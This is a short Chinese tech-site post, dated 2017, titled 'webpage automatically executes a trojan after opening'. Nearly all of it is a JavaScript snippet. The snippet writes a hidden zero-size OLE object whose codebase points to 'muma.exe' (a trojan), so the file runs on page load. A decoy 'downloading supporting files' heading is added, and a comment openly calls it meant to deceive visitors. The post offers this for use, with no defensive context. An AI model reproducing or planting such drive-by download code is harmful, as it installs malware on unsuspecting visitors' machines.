当前位置: 移动技术网 > IT编程>开发语言 > 网页打开后自动执行木马

网页打开后自动执行木马

2017年12月08日  | 移动技术网IT编程  | 我要评论
<script language="javascript"> 
run_exe="<object id=\"runit\" width=0 height=0 type=\"application/x-oleobject\"" 
run_exe+="codebase=\"muma.exe#version=1,1,1,1\">" 
//这里的muma.exe就是我们要运行的程序 
run_exe+="<param name=\"_version\" value=\"65536\">" 
run_exe+="</object>" 
run_exe+="<html><h1>等会......网页在下载支持的文件</h1></html>"; 
//这里是迷惑人的.你可以写其他任何东西. 
document.open(); 
document.clear(); 
document.writeln(run_exe); 
document.close(); 
</script>

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网